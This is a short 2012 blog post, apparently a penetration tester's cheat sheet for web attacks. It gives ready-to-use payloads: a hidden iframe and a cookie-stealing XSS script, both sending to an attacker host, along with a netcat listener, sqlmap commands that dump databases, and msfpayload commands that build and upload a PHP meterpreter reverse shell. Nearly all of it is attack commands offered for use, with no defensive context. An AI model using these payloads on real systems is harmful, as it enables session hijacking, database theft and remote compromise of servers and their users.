Monday, July 30, 2012


  • All in on web tool:-
  • Via XSS:-
    • Exploiting the browser:-
      • setup metasploit auxiliary/server/browser_autopwn to listen for connection
      • post an IFrame tag on vulnerable site: <iframe SRC="http://ATTACKERIP/URIPATH" height = "0" width ="0">
    • Stealing Session cookies:- 
      • setup a netcat listener: nc -lvp80
      • Steal session cookies with the following: <script> new Image().src="http://ATTACKERIP/bogus.php?output="+document.cookie; </script> 
    •  Bypassing Filters:- 

    • Via SQL Injection:-
      • Via GET
      • show databases: ./sqlmap -u --dbs
      • show tables: ./sqlmap -u -D <database> --tables
      • show data: ./sqlmap -u --D <database_name> -T <table_name> --dump
      • Via POST
      • show databases: ./sqlmap -u --data "user=&pass=&submit=" --dbs
      • Via WEBDAV:-
        • Download and run ryan linn's webdav test from here
        • create a payload in an allowed format ie php: msfpayload php/meterpreter/reverse_tcp LHOST=ATTACKERIP R | msfencode -o meterpreter.php
        • start a metasploit reverse handler
        • upload the malicious payload to the target server via ftp,ssh,php,webdav (dave),rfi etc.
        • browse to the file http://target/meterpreter.php

      No comments:

      Post a Comment